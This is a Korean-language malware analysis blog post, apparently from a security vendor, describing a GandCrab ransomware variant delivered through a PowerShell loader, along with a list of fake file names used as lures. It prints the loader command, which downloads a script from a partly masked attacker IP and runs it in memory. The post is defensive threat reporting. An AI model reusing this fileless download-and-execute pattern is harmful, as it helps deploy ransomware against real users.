갠드크랩(GandCrab) 랜섬웨어는 타 랜섬웨어와 비교하면 그 유포방식이 다양하다. 다양한 유포방식은 브라우저 취약점을 통한 드라이브 바이 다운로드, 정상 소프트웨어 위장, 이메일 문서 첨부방식 등이 확인되었다. 다양한 유포방식에 못지않게 랜섬웨어의 파일 외형 또한 다양한 방식으로 변화를 보이고 있다. 최근 ASEC은 이러한 유포방식을 모니터링 중 파워쉘 스크립트 형태로 동작하는 갠드크랩 랜섬웨어의 유포 정황을 발견했다. 과거에 이와 유사한 형태가 문서파일 내부의 매크로 코드에서 확인된 사례가 있으나, 실행파일에서 파워쉘을 이용한 것이 확인된 것은 이번이 처음이다.
아래 <그림 1>은 갠드크랩 랜섬웨어를 다운로드하는 기능을 수행하는 실행파일(EXE)의 코드 중 일부이다. 해당 실행파일은 파워쉘 커맨드를 실행하는 기능만 수행한다.
<그림 1. 파워쉘 스크립트를 실행하는 부분>
해당 파워쉘 커맨드는 유포지 서버로부터 랜섬웨어 본체를 사용자 시스템에 생성과정 없이 메모리에서 실행시킨다. 따라서 동작 시, <그림 2>와 같은 프로세스 트리를 보이며, 정상 프로세스인 Powershell.exe가 파일을 암호화하는 프로세스가 된다.
<그림 2. 프로세스 트리>
<표 1>은 <그림 1>에서 사용되는 파워쉘 명령이다. 해당 구문은 공격자 서버로부터 다운로드 받은 파워쉘 스크립트의 특정 함수(Invoke-GandCrab)의 실행을 의미한다. 그리고 Invoke-GandCrab 함수실행 후, 일정 시간(1000000초=270시간)을 대기한다. 이는 파일이 암호화되는 동안 프로세스가 종료되지 못하도록 하기 위함으로 파악된다. 또한 공격자는 교묘하게도 유포할 파워쉘 스크립트의 파일명을 ahnlab.txt로 사용했다.
파워쉘 명령 |
IEX ((new-object net.webclient).downloadstring('http://91.x10.1x4.x4x/ahnlab.txt'));Invoke-GandCrab;Start-Sleep -s 1000000; |
<표 1. 파워쉘 스크립트 구동관련 코드>
아래 <그림 3>은 파워쉘 스크립트로 내부에 Invoke-GandCrab 함수가 존재하며, 유포지 서버가 활성화되어 있을경우, <표 1>의 파워쉘 명령으로 해당 함수가 사용자 시스템에서 실행된다. 이처럼 같은 랜섬웨어 일지라도 파일의 유형은 계속해서 다양해질 것으로 예측된다.
<그림 3. 파워쉘 스크립트 내의 실행함수>
현재 안랩 제품에서는 파워쉘 스크립트로 유포되는 갠드크랩 랜섬웨어를 다음과 같이 진단하고 있다.
추가로, 최근 정상파일로 위장하여 배포되는 GandCrab은 아래와 같은 파일명들이 확인되었다.
windows_7_iso.exe
건축_도면.exe
카트라이더_핵.exe
판도라tv_동영상.exe
무료_mp3_음악.exe
ppt_템플릿.exe
태양의_후예.exe
워프레임_캐시.exe
오토_캐드_2010.exe
윈도우7_정품인증.exe
파워포인트_2010.exe
네이버tv_동영상.exe
사이툴_한글판.exe
mlb2k12.exe
웹페이지.exe
web_동영상.exe
곰오디오_스킨.exe
병맛_전쟁_시뮬레이터.exe
스팀_창작마당.exe
로지텍_드라이버_속도.exe
링크티비.exe
네이버_동영상_편집기.exe
뿌요뿌요_테트리스.exe
일러스트_레이터_cs5.exe
'악성코드 정보' 카테고리의 다른 글
‘EternalBlue’ SMB 취약점(MS17-010)을 통한 악성코드 감염 확산 (0) | 2018.07.11 |
---|---|
VB6 외형으로 유포 중인 헤르메스 랜섬웨어 v2.1 (0) | 2018.07.10 |
동일 URL에서 유포되는 Hermes v2.1과 GandCrab v4 랜섬웨어 (0) | 2018.07.05 |
음란물과 함께 유포되는 GoBot2 악성코드 주의 (0) | 2018.06.21 |
GrandSoft 익스플로잇 킷을 통한 갠드크랩 랜섬웨어 유포 (0) | 2018.06.20 |
댓글